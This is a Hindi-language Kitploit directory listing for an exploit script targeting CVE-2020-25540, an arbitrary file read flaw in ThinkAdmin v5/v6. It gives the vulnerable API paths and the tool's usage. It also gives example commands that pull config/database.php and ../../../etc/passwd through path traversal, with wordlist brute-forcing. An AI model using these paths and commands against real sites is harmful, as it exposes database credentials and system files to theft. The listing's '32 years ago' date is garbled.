Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 में मनमाना फ़ाइल पठन दोष एक्सप्लॉइट, कस्टम डिक्शनरी ब्रूट-फोर्स सक्षम। | Kitploit
उपकरण/GitHubGitHub/simonlee-hello/cve-2020-25540
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 में मनमाना फ़ाइल पठन दोष एक्सप्लॉइट, कस्टम डिक्शनरी ब्रूट-फोर्स सक्षम।

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2020-25540

यह स्क्रिप्ट ThinkAdmin v5, v6 संस्करणों में मनमानी फ़ाइल पढ़ने की कमजोरी का शोषण करने के लिए है।

==इंटरफ़ेस पथ विभिन्न संस्करणों में भिन्न हो सकते हैं (कुछ मूल ThinkAdmin से दूसरे संस्करण हैं)==

  • मूल इंटरफ़ेस है: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • मेरे इस संस्करण में (एक निश्चित धन पूल द्वारा दूसरा संस्करण): /admin.html?s=admin/api.Update/read?encode=xxxx

मूल उपयोग

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
टूल डाउनलोड करें